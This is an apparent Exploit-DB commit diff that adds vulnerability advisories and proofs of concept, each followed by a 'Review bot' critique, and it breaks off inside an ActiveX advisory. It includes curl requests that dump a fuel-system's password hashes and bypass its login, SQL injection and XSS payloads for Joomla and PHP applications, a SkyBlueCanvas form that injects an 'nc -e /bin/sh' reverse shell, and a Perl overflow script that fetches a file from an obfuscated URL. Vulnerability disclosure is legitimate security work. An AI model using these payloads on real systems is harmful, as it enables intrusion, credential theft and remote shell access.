Updated 01_26_2014

This commit is contained in:
Offensive Security 2014-01-26 04:24:08 +00:00
parent d2bf97c490
commit 38a3e9c9c4
14 changed files with 1461 additions and 0 deletions


@ -27988,3 +27988,16 @@ id,file,description,date,author,platform,type,port
31162,platforms/php/webapps/31162.txt,"okul siteleri 'com_mezun' Component SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0
31163,platforms/windows/remote/31163.txt,"WinIPDS 3.3 rev. G52-33-021 Directory Traversal and Denial of Service Vulnerabilities",2008-02-12,"Luigi Auriemma",windows,remote,0
31164,platforms/php/webapps/31164.txt,"Prince Clan Chess Club 0.8 com_pcchess Component 'user_id' Parameter SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0
31168,platforms/windows/dos/31168.pl,"NCH Software Express Burn Plus 4.68 (.EBP) Project File Buffer Overflow",2014-01-24,LiquidWorm,windows,dos,0
31171,platforms/php/webapps/31171.txt,"XOS Shop 1.0 rc7o (redirect.php, goto param) - SQL Injection Vulnerability",2014-01-24,"JoKeR DZ",php,webapps,80
31173,platforms/php/webapps/31173.txt,"pChart 2.1.3 - Multiple Vulnerabilities",2014-01-24,"Balazs Makany",php,webapps,80
31174,platforms/php/webapps/31174.txt,"Joomla Komento Extension 1.7.2 - Stored XSS Vulnerabilities",2014-01-24,"High-Tech Bridge SA",php,webapps,80
31175,platforms/php/webapps/31175.txt,"Joomla JV Comment Extension 3.0.2 (index.php, id param) - SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80
31176,platforms/windows/dos/31176.html,"MW6 Technologies Aztec ActiveX (Data param) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
31177,platforms/windows/dos/31177.html,"MW6 Technologies DataMatrix ActiveX (Data param) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
31178,platforms/windows/dos/31178.html,"MW6 Technologies MaxiCode ActiveX (Data param) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
31179,platforms/windows/remote/31179.html,"Daum Game 1.1.0.5 ActiveX (IconCreate Method) - Stack Buffer Overflow",2014-01-24,"Trustwave's SpiderLabs",windows,remote,0
31180,platforms/hardware/webapps/31180.txt,"Franklin Fueling TS-550 evo 2.0.0.6833 - Multiple Vulnerabilities",2014-01-24,"Trustwave's SpiderLabs",hardware,webapps,10001
31181,platforms/windows/remote/31181.rb,"HP Data Protector Backup Client Service Directory Traversal",2014-01-24,metasploit,windows,remote,5555
31182,platforms/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",windows,local,0
31183,platforms/php/webapps/31183.txt,"SkyBlueCanvas CMS 1.1 r248-03 - Remote Command Execution",2014-01-24,"Scott Parish",php,webapps,80
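Review bot: the `port` column is not applied consistently in this hunk: the new php/webapps rows 31171, 31173, 31174, 31175 and 31183 carry 80, while the backfilled php/webapps rows 31162 and 31164 carry 0, so a filter on port will return only part of the web entries; settle on one convention for web applications and apply it to the backfilled rows too. Two rows also disagree with the files they index: 31171 is credited to "JoKeR DZ" but the file is signed "JoKeR_StEx", and 31183 is titled "Remote Command Execution" while the advisory's own heading says "Remote Command Injection"; the index should mirror the file headers so searches match either way. The three 2008-02-12 rows (31162, 31163, 31164) are out of sequence with the 2014-01-24 rows and look like backfilled entries; the commit message "Updated 01_26_2014" should say so.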



@ -0,0 +1,127 @@
Trustwave's SpiderLabs Security Advisory TWSL2014-001:
Multiple Vulnerabilities in Franklin Fueling's TS-550 evo
Published: 01/03/2014
Version: 1.0
Vendor: Franklin Fueling Systems (http://www.franklinfueling.com/)
Product: TS-550 evo device
Version affected: Firmware 2.0.0.6833 confirmed. Affects prior to version
2.4.0
Product description:
A fuel management system with a programmable interface used for inventory
and delivery management.
Finding 1: Insufficient Access Control
Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs
CVE: CVE-2013-7247
CWE: CWE-200
As the Guest user (the lowest privilege), a user can post the
cmdWebGetConfiguration parameter to cgi-bin/tsaws.cgi. This will return the
usernames and password hashes (in DES format) for all users of the
application. Once dumped, they can be cracked and used to access
authenticated portions of the application.
#Request
curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://<ip>:10001/cgi-bin/tsaws.cgi
#Response
<TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-02-19T22:09:22Z" TIME_STAMP_LOCAL="2013-02-19T17:09:22" KEY="11111111" ROLE="roleGuest"><TSA_RESPONSE COMMAND="cmdWebGetConfiguration"><CONFIGURATION>
<DEBUGGING LOGGING_ENABLED="false" LOGGING_PATH="/tmp"/>
<ROLE_LIST>
<ROLE NAME="roleAdmin" PASSWORD="YrKMc2T2BuGvQ"/>
<ROLE NAME="roleUser" PASSWORD="2wd2DlEKUPTr2"/>
<ROLE NAME="roleGuest" PASSWORD="YXFCsq2GXFQV2"/>
</ROLE_LIST>
</CONFIGURATION></TSA_RESPONSE></TSA_RESPONSE_LIST>
Finding 2: Hardcoded Technician Credentials
Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs
CVE: CVE-2013-7248
CWE: CWE-798
The three primary users on the TS550 are roleGuest, roleUser, and
roleAdmin. Another user exists with additional access named roleDiag. This
user can access extra portions of the application such as the command line
interface, enable and disable SSH, as well as run SQL commands all from the
web interface. The CLI interface includes the ability to run engineering
and manufacturing commands. The password for roleDiag is the key (a value
returned with every POST request to tsaws.cgi) DES encrypted. This can be
done in Ruby:
$ irb
1.9.3p374 :001 > "11111111".crypt("aa")
=> "aaDTlAa1fGGC."
#Request
curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST PASSWORD="aaDTlAa1fGGC."><TSA_REQUEST COMMAND="cmdWebCheckRole"/></TSA_REQUEST_LIST>' http://<ip>:10001/cgi-bin/tsaws.cgi
#Response (note the ROLE)
<TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-03-04T16:53:01Z" TIME_STAMP_LOCAL="2013-03-04T11:53:01" KEY="11111111" ROLE="roleDiag"><TSA_RESPONSE COMMAND="cmdWebCheckRole"></TSA_RESPONSE></TSA_RESPONSE_LIST>
The password can then be used to run various roleDiag commands. An attacker
can enable SSH, and since root's password is the same as roleAdmin, they
can completely compromise the device.
Remediation Steps:
According to Franklin Fueling, version 2.4.0 mitigates these
vulnerabilities. However, Trustwave SpiderLabs have not verified this fix.
Revision History:
04/16/13 - Vulnerability disclosed to vendor
12/18/13 - Fix released on a limited basis by vendor
01/03/14 - Advisory published
References
1. http://www.franklinfueling.com/evo/
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
________________________________
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is strictly prohibited. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
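Review bot: the trailing paragraph beginning "This transmission may contain information that is privileged" is the sender's e-mail confidentiality footer, not part of the advisory, and it should be stripped before the file is archived (as written it forbids redistributing the very text being published). Inside the advisory, "Version affected: Firmware 2.0.0.6833 confirmed. Affects prior to version 2.4.0" is ambiguous about what was tested versus inferred, and "Remediation Steps" only relays the vendor's claim that 2.4.0 mitigates the issues; state plainly that 2.0.0.6833 was the tested build, that releases before 2.4.0 are believed affected, and that the fix is unverified by the reporters. Finally, Finding 1 and Finding 2 are linked but the text never says so: the `KEY="11111111"` attribute in the roleGuest response to `cmdWebGetConfiguration` is the same value from which Finding 2 derives the roleDiag password, so the guest-readable configuration is what makes the hardcoded-credential issue reachable with no credentials at all; one sentence making that chain explicit would justify a higher combined severity than CWE-200 (information disclosure) alone suggests.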

platforms/php/webapps/31171.txt Executable file

@ -0,0 +1,43 @@
################################################################################
# Exploit Title: XOS Shop_v1.0_rc7o Sql Injection Vulnerability
# Date: 23/01/2014
# Exploit Author: JoKeR_StEx
# Vendor Homepage: http://www.xos-shop.com/
# Software Link: http://xos-shop.com/main/index.php/cPath/25/
# Version: v1.0 rc7o
# Tested on: Windows PHP Version 6.0.0-dev
# CVE : [~]
##################################################################################
[-] Description :
XOS Shop is affected by Sql Injection Vulnerability
The Attacker Can inject some MYSQl and exploit it(get content of db)
[+] VUlnerability :
Affected File ==> redirect.php
Line 47;53
<?
switch($_GET['action']){
47: case 'url':
48: if (isset($_GET['goto']) && xos_not_null($_GET['goto'])) {
49: $check_query = xos_db_query("select products_url from " . TABLE_PRODUCTS_DESCRIPTION . " where products_url = '" . xos_db_input($_GET['goto']) . "' limit 1");
50: if (xos_db_num_rows($check_query)) {
51: xos_redirect('http://' . $_GET['goto'])
52: break;
53: }
?>
[-]Exploit
http://127.0.0.1/Xoshop/shop/redirect.php?action=url&goto='
http://127.0.0.1/Xoshop/shop/redirect.php?action=url&goto=[SQLI]
###################################################################################
# Gr33ting's : Asesino04 , Shield Dz , Drr.0ryx & All My Friedns
###################################################################################
eamil : jokerdz44@yahoo.fr
Facebook : fb.me/imadlilong.lasvegas
Twitter : @JoKeR_StEx
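Review bot: the quoted code does not support the SQL injection claim as written: in the excerpt, `$_GET['goto']` is passed through `xos_db_input()` before it is interpolated into the `products_url` query, and the advisory never explains how that escaping is bypassed; the "Exploit" section is only a bare quote and an `[SQLI]` placeholder with no observed output or error. What the excerpt does show unambiguously is `xos_redirect('http://' . $_GET['goto'])`, where the raw parameter becomes the redirect target, i.e. an open redirect; the write-up should either demonstrate the injection or retitle the finding to match the evidence. Also missing from the excerpt is the statement terminator after `xos_redirect(...)`, so the snippet is not a faithful copy of the source. Minor: "Tested on: Windows PHP Version 6.0.0-dev" names a PHP release that never shipped, "CVE : [~]" should read N/A, and the author line ("JoKeR_StEx") does not match the files.csv entry ("JoKeR DZ").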

platforms/php/webapps/31173.txt Executable file

@ -0,0 +1,56 @@
# Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS
# Date: 2014-01-24
# Exploit Author: Balazs Makany
# Vendor Homepage: www.pchart.net
# Software Link: www.pchart.net/download
# Google Dork: intitle:"pChart 2.x - examples" intext:"2.1.3"
# Version: 2.1.3
# Tested on: N/A (Web Application. Tested on FreeBSD and Apache)
# CVE : N/A
[0] Summary:
PHP library pChart 2.1.3 (and possibly previous versions) by default
contains an examples folder, where the application is vulnerable to
Directory Traversal and Cross-Site Scripting (XSS).
It is plausible that custom built production code contains similar
problems if the usage of the library was copied from the examples.
The exploit author engaged the vendor before publicly disclosing the
vulnerability and consequently the vendor released an official fix
before the vulnerability was published.
[1] Directory Traversal:
"hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd"
The traversal is executed with the web server's privilege and leads to
sensitive file disclosure (passwd, siteconf.inc.php or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server's configuration.
This problem may exists in the production code if the example code was
copied into the production environment.
Directory Traversal remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.
[2] Cross-Site Scripting (XSS):
"hxxp://localhost/examples/sandbox/script/session.php?<script>alert('XSS')</script>
This file uses multiple variables throughout the session, and most of
them are vulnerable to XSS attacks. Certain parameters are persistent
throughout the session and therefore persists until the user session
is active. The parameters are unfiltered.
Cross-Site Scripting remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.
[3] Disclosure timeline:
2014 January 16 - Vulnerability confirmed, vendor contacted
2014 January 17 - Vendor replied, responsible disclosure was orchestrated
2014 January 24 - Vendor was inquired about progress, vendor replied
and noted that the official patch is released.
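Review bot: the XSS example under "[2] Cross-Site Scripting (XSS)" is incomplete: the URL is missing its closing double quote, and the query string `?<script>alert('XSS')</script>` names no parameter, while the paragraph below says "multiple variables" are affected without listing a single one; name at least one parameter so the finding can be verified against the patched release. Both remediation lists say "Update to the latest version of the software" but the fixed version number is never given, even though the disclosure timeline says the official patch is released; put the version in. The traversal URL uses the `hxxp` defang convention and `%2f`-encoded slashes, which is fine, but say so or readers will read the scheme as a typo. Typo: "This problem may exists" should be "may exist".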

platforms/php/webapps/31174.txt Executable file

@ -0,0 +1,73 @@
Advisory ID: HTB23194
Product: Komento Joomla Extension
Vendor: Stack Ideas Sdn Bhd.
Vulnerable Version(s): 1.7.2 and probably prior
Tested Version: 1.7.2
Advisory Publication: January 2, 2014 [without technical details]
Vendor Notification: January 2, 2014
Vendor Patch: January 2, 2014
Public Disclosure: January 23, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-0793
Risk Level: Medium
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered two XSS vulnerabilities in Komento Joomla Extension, which can be exploited to perform script insertion attacks.
1) Cross-Site Scripting (XSS) in Komento Joomla Extension: CVE-2014-0793
1.1 The vulnerability exists due to insufficient sanitisation of user-supplied data passed via the "website" HTTP POST parameter to "/?option=com_komento" URL. A remote attacker can submit a comment with specially crafted "Website" field and execute arbitrary HTML and script code in browser in context of the vulnerable website when a user clicks on the nickname of the malicious author.
The following exploitation example uses the "alert()" JavaScript function to display word "immuniweb" when user clicks on the attacker's nickname in comment:
<form action="http://[host]/?option=com_komento" method="post" name="main">
<input type="hidden" name="tmpl" value="component">
<input type="hidden" name="format" value="ajax"> <input type="hidden" name="no_html" value="1"> <input type="hidden" name="component" value="com_content"> <input type="hidden" name="cid" value="24"> <input type="hidden" name="comment" value="comment"> <input type="hidden" name="parent_id" value="0"> <input type="hidden" name="name" value="name"> <input type="hidden" name="email" value="email@email.com"> <input type="hidden" name="website" value='http://www.htbridge.com"
onclick="javascript:alert(/immuniweb/);"'>
<input type="hidden" name="subscribe" value="false"> <input type="hidden" name="latitude" value=''>
<input type="hidden" name="longitude" value="1"> <input type="hidden" name="address" value="1"> <input type="hidden" name="contentLink" value="http://joomla/"> <input type="hidden" name="pageItemId" value="435"> <input type="hidden" name="option" value="com_komento"> <input type="hidden" name="namespace" value="site.views.komento.addcomment">
<input type="hidden" name="4873559e1d03545682ae270bf7b0c8ec" value="1"> <input type="submit" id="btn"> </form>
1.2 The vulnerability exists due to insufficient sanitisation of user-supplied data passed via the "latitude" HTTP POST parameter to "/?option=com_komento" URL. A remote attacker can submit a comment with specially crafted "latitude" field and execute arbitrary HTML and script code in browser in context of the vulnerable website when a user clicks on the address of the malicious author.
The following exploitation example uses the "alert()" JavaScript function to display word "immuniweb" when user clicks on the attacker's address in comment:
<form action="http://[host]/?option=com_komento" method="post" name="main">
<input type="hidden" name="tmpl" value="component">
<input type="hidden" name="format" value="ajax"> <input type="hidden" name="no_html" value="1"> <input type="hidden" name="component" value="com_content"> <input type="hidden" name="cid" value="24"> <input type="hidden" name="comment" value="comment"> <input type="hidden" name="parent_id" value="0"> <input type="hidden" name="name" value="name"> <input type="hidden" name="email" value="email@email.com"> <input type="hidden" name="website" value='www.htbridge.com'>
<input type="hidden" name="subscribe" value="false"> <input type="hidden" name="latitude" value='"
onclick="javascript:alert(/imuniweb/);">'>
<input type="hidden" name="longitude" value="1"> <input type="hidden" name="address" value="1"> <input type="hidden" name="contentLink" value="http://joomla/"> <input type="hidden" name="pageItemId" value="435"> <input type="hidden" name="option" value="com_komento"> <input type="hidden" name="namespace" value="site.views.komento.addcomment">
<input type="hidden" name="4873559e1d03545682ae270bf7b0c8ec" value="1"> <input type="submit" id="btn"> </form>
-----------------------------------------------------------------------------------------------
Solution:
Update to Komento 1.7.3
More Informaion:
http://stackideas.com/downloads/changelog/komento
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23194 - https://www.htbridge.com/advisory/HTB23194 - Cross-Site Scripting (XSS) in Komento Joomla Extension.
[2] Komento Joomla Extension - http://stackideas.com/ - Komento is a Joomla comment extension for articles and blogs in K2, EasyBlog, ZOO, Flexicontent, VirtueMart and redShop.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
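Review bot: both HTML forms have been flattened so that several `<input>` elements share one line, and in each form the payload-bearing value (`website` in the first, `latitude` in the second) is split across a line break inside a quoted attribute, which makes the payload boundaries hard to read; reflow them one element per line before archiving. The second example's alert text reads `alert(/imuniweb/)` while the prose above it says the word displayed is "immuniweb"; align the two. "More Informaion" is a typo. The hidden field named `4873559e1d03545682ae270bf7b0c8ec` with value `1` is Joomla's session form token, so the example is bound to the session in which it was captured; the advisory should say that rather than present the name as a constant, otherwise readers will report the example as non-reproducible.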

platforms/php/webapps/31175.txt Executable file

@ -0,0 +1,60 @@
Advisory ID: HTB23195
Product: JV Comment Joomla Extension
Vendor: joomlavi.com
Vulnerable Version(s): 3.0.2 and probably prior
Tested Version: 3.0.2
Advisory Publication: January 2, 2014 [without technical details]
Vendor Notification: January 2, 2014
Vendor Patch: January 14, 2014
Public Disclosure: January 23, 2014
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-0794
Risk Level: Medium
CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in JV Comment Joomla Extension, which can be exploited to perform SQL Injection attacks.
1) SQL Injection in JV Comment Joomla Extension: CVE-2014-0794
The vulnerability exists due to insufficient validation of "id" HTTP POST parameter passed to "/index.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.
The following exploitation example displays version of MySQL database:
<form action="http://[host]/index.php" method="post" name="main">
<input type="hidden" name="option" value="com_jvcomment">
<input type="hidden" name="task" value="comment.like">
<input type="hidden" name="id" value="1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))">
<input type="submit" id="btn">
</form>
-----------------------------------------------------------------------------------------------
Solution:
Update to JV Comment 3.0.3
More Information:
http://extensions.joomla.org/extensions/contacts-and-feedback/articles-comments/23394
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23195 - https://www.htbridge.com/advisory/HTB23195 - SQL Injection in JV Comment Joomla Extension.
[2] JV Comment Joomla Extension - http://www.joomlavi.com/joomla-extensions/jv-comment.html - With JV Comment, adding a comment system to your articles is now as simple as installing a plug-in and adjusting a few parameters.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
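Review bot: the advisory identifies only the request that triggers the injection (`option=com_jvcomment`, `task=comment.like`, the `id` field) and never the vulnerable file or the query inside the extension that receives `id`, so a reader cannot confirm that the 3.0.3 fix covers it or check whether other tasks build the same query; add the code location. The CVSS vector `Au:S` is consistent with "A remote authenticated attacker" in the details, which is good; the first sentence of the details, "discovered SQL injection vulnerability in JV Comment Joomla Extension, which can be exploited to perform SQL Injection attacks", is missing an article and restates the title, so tighten it.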

platforms/php/webapps/31183.txt Executable file

@ -0,0 +1,55 @@
Vulnerability in SkyBlueCanvas CMS
Vulnerability Type:
Remote Command Injection
Version Affected:
1.1 r248-03 (and probably prior versions)
Discovered by:
Scott Parish - Center for Internet Security
Vendor Information:
SkyBlueCanvas is an easy-to-use Web Content Management System, that makes it simple to keep the content of your site
fresh. You simply upload the software to your web server, and you are ready to start adding text and pictures to your
web site.
Vulnerability Details:
The SkyBlueCanvas Lightweight CMS application contains a remote command injection vulnerability within the form on the
Contact page. A remote un-authenticated user can exploit this vulnerability to force the webserver to execute commands
in the context of the vulnerable application. It is possible to exploit this vulnerability because the POST parameters
"name", "email", "subject", and "message" are not properly sanitized when submitted to the index.php?pid=4 page.
Arbitrary commands can be executed by injecting the following payload to a vulnerable parameter:
A"; <command>
Since the page does not display the results of the injected command (blind injection) then testing must be done using a
ping, nc, or similar command.
Proof of Concept Exploit Code:
<html>
<body>
<form action="http://localhost/index.php?pid=4"; method="post">
<input type="hidden" name="cid" value="3">
<input type="hidden" name="name" value="test&#34;&#59; nc -e /bin/sh 192.168.1.2 12345">
<input type="hidden" name="email" value="test">
<input type="hidden" name="subject" value="test">
<input type="hidden" name="message" value="test">
<input type="hidden" name="action" value="Send">
<input type="submit" value="submit">
</form>
</body>
</html>
References:
http://skybluecanvas.com/
Remediation:
The vendor has issued a fix to the vulnerability in version 1.1 r248-04
Revision History:
1/9/14 - Vulnerability discovered
1/10/14 - Vulnerability disclosed privately to vendor
1/22/14 - Patch released by vendor
1/23/14 - Vulnerability disclosed publicly
This message and attachments may contain confidential information. If it appears that this message was sent to you by
mistake, any retention, dissemination, distribution or copying of this message and attachments is strictly prohibited.
Please notify the sender immediately and permanently delete the message and any attachments.
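Review bot: the final paragraph beginning "This message and attachments may contain confidential information" is an e-mail confidentiality footer, not part of the advisory, and should be stripped before archiving. In the proof-of-concept form, `action="http://localhost/index.php?pid=4"; method="post"` has a stray `;` after the closing quote of the `action` attribute; browsers tolerate it, but it is a typo in the archived PoC. The advisory gives the payload shape `A"; <command>` and says the `name`, `email`, `subject` and `message` parameters are not sanitised, but it never identifies the file or the shell call that receives them, so the fix in 1.1 r248-04 cannot be checked against the code; add the location. The vulnerability type is "Remote Command Injection" here but "Remote Command Execution" in files.csv; use one term.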

platforms/windows/dos/31168.pl Executable file

@ -0,0 +1,107 @@
?#!/usr/local/bin/perl
#
#
# NCH Software Express Burn Plus 4.68 EBP Project File Handling Buffer Overflow PoC
#
#
# Vendor: NCH Software
# Product web page: http://www.nchsoftware.com
# Affected version: 4.68
#
# Summary: Express Burn is a program that allows you to create and copy many
# kinds of disc media, including Audio (audio CDs / .mp3 CDs), Video (DVDs),
# and Data (CDs / DVDs / Blu-ray).
#
# Desc: The vulnerability is caused due to a boundary error in the processing
# of a project file, which can be exploited to cause a unicode buffer overflow
# when a user opens e.g. a specially crafted .EBP file. Successful exploitation
# could allow execution of arbitrary code on the affected machine.
#
#
# ===========================================================================
#
# (1144.1488): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\NCH Software\ExpressBurn\expressburn.exe
# eax=03418568 ebx=004034ec ecx=00000041 edx=00011a98 esi=03429428 edi=001893df
# eip=004679ef esp=00185f18 ebp=00187254 iopl=0 nv up ei pl nz na pe nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
# expressburn+0x679ef:
# 004679ef 66890c02 mov word ptr [edx+eax],cx ds:002b:0342a000=????
# 0:000> d eax
# 03418568 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 03418578 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 03418588 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 03418598 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 034185a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 034185b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 034185c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 034185d8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
#
# ===========================================================================
#
#
# Tested on: Microsoft Windows 7 Professional SP1 EN
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - http://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2014-5166
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5166.php
#
#
# 20.01.2014
#
use Cwd;
use LWP::Simple;
print "\n
#=---===---===---===---===---===---===---===---=#
| |
| Proof Of Concept script for |
| |
| NCH Software Express Burn Plus v4.68 |
| |
| |
| ID: ZSL-2014-5166 |
| |
| --- |
| |
| Copyleft (c) 2014 |
| |
| Zero Science Lab - http://www.zeroscience.mk |
| |
#=---===---===---===---===---===---===---===---=#
\n";
$file = "Exploit2.EBP";
$zoom = substr(")aZh4/",3,1).substr("^7ttr",2,2).substr("p>eErZ",0,1).
substr("7U:/.9",2,2).substr("v/!+T",1,1).substr("oL4z55",3,1).
substr("erY3%",0,2).substr("8oscW1",1,3).substr("iLien@",2,3).
substr("*hJ2ce",4,2).substr("6.#h1A",1,1).substr("mk-((",0,2).
substr(">/cZo",1,2).substr("[Mood]4",3,2).substr("lesS?",1,2).
substr("a*\@J/b",4,2).substr("lue8X",0,3).substr("fish6",0,4).
substr(",,8Y.b",4,1).substr("GrUmp!",3,2).substr("1337:",2,1);
print "\n\n\x20\x20\x1A Creating malicious project file...\n\n";
$decoy = "440Hz.mp3";
getstore($zoom, $decoy);
print "\x20\x20\x1A Throwing decoy file: $decoy...\n";
$buffer = "\x41\x41\x41\x41" x (15000/2);
$dir = getcwd;
$dir =~ s/\//\\/g;
$load = "<?xml version=\"1.0\"?>\<ExpressBurnProject type=\"0\"><Alb".
"umTitle/><TrackList><Audiotrack file=\"$dir\\$decoy\" title".
"=\"$buffer\" artist=\"Salvador\"/></TrackList>\r</ExpressBu".
"rnProject>\r";
open fp, ">./$file" || die "\n[-] Can't open $file: $!\n\n";
print fp $load; close fp;
print "\n\x20\x20\x19 File created successfully: $file ";
$file = -s $file; print "($file bytes)\n\n\n";
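Review bot: `open fp, ">./$file" || die "\n[-] Can't open $file: $!\n\n";` has the classic Perl precedence bug: `||` binds to the string `">./$file"`, which is always true, so `die` can never fire and a failed open goes unnoticed; use `or die` or parenthesise the `open` arguments. The first line starts with a stray `?` before `#!/usr/local/bin/perl`, which looks like a byte-order mark or encoding artifact from the upload and breaks the shebang, so the script will not run directly. `$zoom` is assembled from a chain of `substr()` fragments and `getstore($zoom, $decoy)` then downloads the decoy from that URL at run time; an obfuscated remote fetch in an archived proof of concept is exactly what a reviewer should push back on, because nobody running the script can see which host is contacted without de-obfuscating it first; spell the URL out in a comment or ship the decoy alongside the script. `"\x41\x41\x41\x41" x (15000/2)` yields 30000 bytes, not the 15000 the expression suggests, and the crash dump shows the string widened to UTF-16 (`41 00 41 00 ...`), so state which length is intended. The script also has no `use strict;` or `use warnings;`.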


@ -0,0 +1,40 @@
<!--
===========================================================================
Problem: The Data parameter is subject to a buffer overflow DEFINITELY
leading to arbitrary code execution.
COM Object - {2355C601-37D1-42B4-BEB1-03C773298DC8} MW6MaxiCode Class
File Description : MaxiCode ActiveX
File Version : 4, 0, 0, 1
To trigger the overflow enter a string larger than 4000 characters.
In the PoC (mw6maxicode.html) you see that Internet Explorer crashes
at trying to copy 42424242 to a register. By disassembling near the
crash location, you can see that both EAX and ECX can be manipulated
respectively with values 41414141 and 42424242. These are later used
to write operations leading to an arbitrary 4 byte write.
===========================================================================
COM Object - {2355C601-37D1-42B4-BEB1-03C773298DC8} MW6MaxiCode Class
*******************************************************************************
COM Object Filename : C:\WINDOWS\system32\MaxiCode.dll
Major Version : 4
